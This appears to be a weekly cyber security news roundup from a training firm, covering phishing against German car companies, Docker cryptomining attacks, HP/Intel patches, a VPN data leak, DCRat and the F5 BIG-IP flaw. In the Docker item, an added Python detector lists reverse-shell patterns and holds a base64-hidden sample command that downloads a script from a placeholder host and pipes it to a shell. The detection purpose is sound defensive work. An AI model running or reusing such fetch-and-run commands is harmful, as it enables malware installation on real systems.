by Richard Beck

QA's practice director of Cyber Security, Richard Beck, rounds up this week's cyber security news.

German automotive companies targeted

A phishing campaign, ongoing for more than a year, has targeted German companies in the automotive industry, including car manufacturers and dealers. The attackers are trying to infect the systems of targeted users with password-stealing malware. Researchers from Check Point spotted the campaign and provided a technical report with details of their findings. The phishing campaign started around July 2021 and is still active.

The attackers registered various lookalike domains (domain squatting) for the operation by cloning the genuine sites of multiple organisations. The fake sites are used to send phishing emails written in German and to host malicious payloads. The goals of the campaign appear to be industrial espionage or business email compromise (BEC). The researchers identified 14 targeted entities, all German organisations with some connection to the auto-making industry, although no company is named.

The infection starts with an email sent to selected targets that carries an ISO disk image, a file type that evades most internet security controls. In the observed samples, the phishing email pretended to contain an automobile transfer receipt sent to a targeted car dealer. The ISO image contains an .HTA file that runs JavaScript or VBScript using HTML smuggling. While the victim sees a decoy document, malicious code runs in the background to fetch malware payloads and execute them.

The attackers are reportedly using a vast infrastructure to impersonate existing German auto firms. The industry is advised to stay vigilant against this ongoing campaign. To remain protected, organisations are recommended to use strong passwords, deploy anti-phishing solutions, and train employees on phishing threats.

Edited. Original Source: CheckPoint

Docker attacks linked to cryptominers

Researchers have spotted ongoing malicious campaigns in a Docker honeypot targeting the exposed Docker API port 2375. The attacks are linked to cryptominers and reverse shells on exposed servers. The Uptycs Threat Research team detected the attacks, which used base64-encoded commands to evade defense mechanisms. The team observed various types of attacks, including coinminer, shell script, and reverse shell.

The coinminer attack uses various shell scripts to drop malicious components by deploying genuine Docker images on servers that expose the Docker API. Another type of cryptominer attack involves heavy obfuscation to evade static defenses: once a shell script executes, the XMRig miner is downloaded from GitHub and mining starts soon afterwards. The third type is a reverse shell attack, in which the attackers open a reverse shell on the exposed server.

In the Docker honeypot, researchers observed large numbers of Kinsing-related attacks on the exposed servers. The malware includes various defense-evasion mechanisms, and a rootkit to hide its malicious activity. The attackers' main goal is to mine cryptocurrency on the exposed servers; the Kinsing shell script includes Docker-related commands to kill miner processes already running on the system. Docker containers are now a fundamental part of application development, and without proper protections these servers become exposed and are targeted by attackers. It is therefore recommended to monitor Docker-related threats regularly and to leverage threat intelligence for better protection.
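As an added example (not code from the original article or from Uptycs), the detection logic below inspects constructed Docker container-create request bodies, decodes any embedded base64 tokens, and flags the behaviours described above: base64-decoding at run time, piping downloads into a shell, XMRig mining, killing competing miners, and reverse shells. The indicator list and the sample requests are assumptions chosen to illustrate the technique.

```python
import base64
import re

# Behaviours described in the report, expressed as substrings a defender would
# not expect in a legitimate container command: piping a download into a shell,
# decoding base64 at run time, XMRig mining, killing competing miners, reverse shells.
INDICATORS = ("| sh", "| bash", "base64 -d", "base64 --decode", "xmrig",
              "pkill", "docker kill", "/dev/tcp/", "nc -e")

# Candidate base64 tokens: long runs of the base64 alphabet with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_tokens(text):
    """Return the printable plaintexts hidden as base64 tokens inside text."""
    plaintexts = []
    for token in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
            plain = raw.decode("ascii")
        except ValueError:  # bad alphabet/padding (binascii.Error) or not ASCII
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in plain):
            plaintexts.append(plain)
    return plaintexts


def analyze_create_request(req):
    """Inspect one POST /containers/create body; return (reason, evidence) pairs."""
    cmd = " ".join((req.get("Entrypoint") or []) + (req.get("Cmd") or []))
    findings = [("indicator in command", ind) for ind in INDICATORS if ind in cmd]
    for plain in decode_b64_tokens(cmd):
        if any(ind in plain for ind in INDICATORS):
            findings.append(("indicator in base64 payload", plain))
    return findings


def scan(requests):
    """Return the indices of requests that produced at least one finding."""
    return [i for i, req in enumerate(requests) if analyze_create_request(req)]


# Constructed sample request bodies (not real captured traffic). The second one
# hides its real command in base64, as the report describes.
HIDDEN = base64.b64encode(b"wget -qO- http://example.invalid/m.sh | sh; pkill xmrig").decode()
SAMPLE_REQUESTS = [
    {"Image": "nginx:latest", "Cmd": ["nginx", "-g", "daemon off;"]},
    {"Image": "alpine:latest", "Cmd": ["sh", "-c", "echo " + HIDDEN + " | base64 -d | sh"]},
]

if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS):
        print(i, analyze_create_request(SAMPLE_REQUESTS[i]))
```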

Edited. Original Source: Uptycs

HP & Intel announce patches for critical vulnerabilities

HP announced the release of patches for two high-severity vulnerabilities that impact the UEFI firmware of more than 200 laptops, workstations, and other products. The two vulnerabilities are tracked as CVE-2021-3808 and CVE-2021-3809 and have a CVSS score of 8.8. HP has credited Nicholas Starke of Aruba Threat Labs and a researcher who uses the online moniker “yngweijw” for reporting these bugs but did not provide technical information on either of the flaws. However, the company did share a list of impacted products, which includes numerous business notebooks and desktop PCs, as well as desktop workstations, retail point-of-sale devices, and thin client PCs.

“Potential security vulnerabilities have been identified in the BIOS (UEFI Firmware) for certain HP PC products, which might allow arbitrary code execution. HP is releasing firmware updates to mitigate these potential vulnerabilities,” HP notes in its advisory. While firmware updates are already available for most of the affected devices, a few of them have yet to receive patches. Users should read HP’s advisory for further details on impact and updates.

Meanwhile a total of nine documented high-severity issues impact multiple Intel Xeon, Pentium Silver, Rocket Lake Xeon, Core, and Core X series processors, the tech giant notes in an advisory. The most severe of these are four bugs that could lead to elevation of privilege via local access. Tracked as CVE-2021-0154, CVE-2021-0153, CVE-2021-33123, and CVE-2021-0190, the issues have a CVSS score of 8.2. The remaining five high-severity flaws detailed in the advisory could lead to escalation of privilege via local access as well, but have slightly lower CVSS scores. Intel’s advisory also documents two medium-severity issues.

Edited. Original Source: HP

VPN database of 21m user details leaked

On May 7th, 2022, a database containing the personal details and login credentials of 21 million users was leaked in a Telegram group, Hackread.com has learned. In total, the database contains 10GB of data from VPN providers including SuperVPN, GeckoVPN, and ChatVPN, and it is now available for free download on several different Telegram groups. The database was previously put up for sale on the Dark Web last year, but it is currently available on Telegram for free. According to researchers at VPNMentor, the leaked records comprised 10GB of data and exposed 21 million unique records.

Further investigation indicated that the leaked passwords were random, hashed, or salted without collision, so each was different and much more difficult to crack. The majority of the email addresses, about 99.5%, were Gmail accounts. However, researchers at VPNMentor believe that the dumped data is only a subset of the full dump. For now, it is unclear whether the data was stolen in a data breach or obtained from a misconfigured server. Either way, the damage is done and users are now at risk of scams and prying eyes. The primary reason people use VPNs is to ensure anonymity and privacy, which is why exposing the data of VPN users has far-reaching consequences: it is considered more valuable than most leaked data. In this case, the people whose data was exposed might become victims of blackmail, phishing scams, or identity theft, since their full names and email addresses are leaked.

Edited. Original Source: VPNMentor

Very cheap remote access malware selling on forums

DCRat, an actively maintained malware, is available for sale at cheap prices on Russian hacking forums to professional and amateur cybercriminal groups. Researchers from BlackBerry claim that DCRat is the work of a lone threat actor. It is a surprisingly effective tool for opening backdoors on targeted victims’ machines on a small budget. It is written in .NET by an individual using the handles ‘crystalcoder’ and ‘boldenis44’. The RAT is a full-featured backdoor whose functionality is further augmented by third-party plugins created by affiliates using DCRat Studio, an Integrated Development Environment (IDE).

Further, the author used JPHP with a Russian IDE named DevelNext to develop the RAT’s administration tool. Distribution vectors include Cobalt Strike Beacons and Prometheus TDS, a subscription-based crimeware-as-a-service used to spread different payloads. The price of the RAT starts from 500 RUB ($5) for a two-month license, 2,200 RUB ($21) for a year, and 4,200 RUB ($40) for a lifetime subscription. According to forum posts, these prices may be reduced during special promotions. DCRat’s code is improved and maintained on a regular basis and remains available at affordable prices, so the RAT could be used by any novice cybercriminal.

Edited. Original Source: BlackBerry

F5 BIG-IP RCE flaw

Researchers are warning about a critical RCE flaw in F5 BIG-IP for which multiple researchers have already created exploits. Experts suggest applying the latest security updates as soon as possible to prevent attacks. A week ago, F5 disclosed a critical RCE, tracked as CVE-2022-1388, in BIG-IP networking devices. The vulnerability affects the BIG-IP iControl REST authentication component and allows remote attackers to bypass authentication and run commands on the device with elevated privileges. The vulnerable devices are mostly used in the enterprise, so the flaw may allow attackers to gain initial access to networks and spread laterally to other devices.

It has been reported that multiple researchers have created exploits for this new F5 BIG-IP vulnerability. It took researchers two days to create an exploit, and they expect that attackers may also reach the root cause easily. The impact of this exploit could be significant, as it allows threat actors to gain root access to the devices. At present, there are 2,500 devices exposed to the internet, making this a significant risk to organisations. F5 has already released BIG-IP security updates that admins can apply for certain firmware versions; devices running 11.x and 12.x firmware versions will not receive security updates. Further, the firm has released three mitigations for those who cannot upgrade their BIG-IP devices. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the recently disclosed F5 BIG-IP flaw to its Known Exploited Vulnerabilities Catalog following reports of active abuse in the wild.

Edited. Original Source: Computing

Joint government advisory on managed service provider threats

The agencies responsible for cybersecurity from the United States, United Kingdom, Australia, and Canada have issued a second alert this week, stating that attacks on managed service providers (MSP) are expected to increase. The advisory states that if an attacker is able to compromise a service provider, then ransomware or espionage activity could be conducted throughout a provider's infrastructure and attack its customers.

"Whether the customer's network environment is on premises or externally hosted, threat actors can use a vulnerable MSP as an initial access vector to multiple victim networks, with globally cascading effects," the nations advised.

"NCSC-UK, ACSC, CCCS, CISA, NSA, and FBI expect malicious cyber actors -- including state-sponsored advanced persistent threat groups -- to step up their targeting of MSPs in their efforts to exploit provider-customer network trust relationships."

For the purposes of this advice, the MSP definition covers IaaS, PaaS, SaaS, process and support services, as well as cybersecurity services. In pretty obvious advice, the initial recommendation is to not get compromised in the first place. Beyond that, users are advised to adopt a familiar set of measures: improve monitoring and logging, update software, keep backups, use multi-factor authentication, segregate internal networks, apply a least-privilege approach, and remove old user accounts. Users are also advised to check that their contracts contain clauses ensuring MSPs have sufficient security controls in place.

"Customers should ensure that they have a thorough understanding of the security services their MSP is providing via the contractual arrangement and address any security requirements that fall outside the scope of the contract. Note: contracts should detail how and when MSPs notify the customer of an incident affecting the customer's environment," the advisory states. “MSPs, when negotiating the terms of a contract with their customer, should provide clear explanations of the services the customer is purchasing, services the customer is not purchasing, and all contingencies for incident response and recovery."

Edited. Original Source: CERT

Train with QA Cyber Security

Interested in learning more about cyber security? QA's Cyber Security practice offers training, labs, certifications and qualifications in a wide range of subjects, including attack and defence, data privacy, security operations, digital forensics and incident response, secure engineering, cyber governance, risk and compliance, cyber intelligence, and cloud security.

Contact us today.
